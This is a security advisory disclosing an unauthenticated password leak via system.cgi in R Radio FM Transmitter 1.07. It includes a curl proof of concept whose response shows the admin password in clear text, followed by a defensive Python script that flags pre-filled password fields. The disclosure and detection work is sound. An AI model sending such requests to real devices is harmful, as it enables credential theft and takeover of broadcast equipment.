R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure  
Vendor: R Radio Network  
Product web page:  
Affected version: 1.07  
Summary: R Radio FM Transmitter that includes FM Exciter and  
FM Amplifier parameter setup.  
Desc: The transmitter suffers from improper access control  
that allows an unauthenticated actor to directly reference the  
system.cgi endpoint and disclose the clear-text password of the  
admin user, allowing authentication bypass and FM station setup  
Tested on: CSBtechDevice  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2023-5802  
Advisory URL:  
$ curl -s  
<html><head><title>System Settings</title>  
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>
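
Added example (not part of the original advisory or the vendor's code): a defender-side check that parses a saved settings-page response and flags any password input whose value attribute is pre-filled, which is the disclosure shown above. The names audit_response and PasswordFieldAuditor and the FIXED sample are assumptions made for illustration; LEAKY is the response quoted in the advisory.

```python
from html.parser import HTMLParser


class PasswordFieldAuditor(HTMLParser):
    """Collects <input type=password> elements that carry a non-empty value."""

    def __init__(self):
        super().__init__()
        self.findings = []  # list of (field name, length of disclosed value)

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        # HTMLParser lowercases attribute names and accepts unquoted values.
        a = {k: (v or "") for k, v in attrs}
        if a.get("type", "").lower() == "password" and a.get("value", ""):
            # Record only the length so the audit output does not repeat the secret.
            self.findings.append((a.get("name", ""), len(a["value"])))


def audit_response(body):
    """Return the pre-filled password fields found in an HTML response body."""
    auditor = PasswordFieldAuditor()
    auditor.feed(body)
    auditor.close()
    return auditor.findings


# Response body as quoted in the advisory above.
LEAKY = (
    "<html><head><title>System Settings</title>\n"
    "Password for user 'admin'</td><td><input type=password name=pw "
    'size=10 maxlength=10 value="testingus"></td>'
)

# Constructed sample: the same form with the stored password no longer echoed back.
FIXED = LEAKY.replace('value="testingus"', 'value=""')

if __name__ == "__main__":
    for label, body in (("advisory response", LEAKY), ("constructed fix", FIXED)):
        hits = audit_response(body)
        if hits:
            for name, length in hits:
                print(f"{label}: field '{name}' discloses a {length}-character password")
        else:
            print(f"{label}: no pre-filled password fields")
```

An empty result covers only the disclosure; whether system.cgi is served without authentication has to be checked separately.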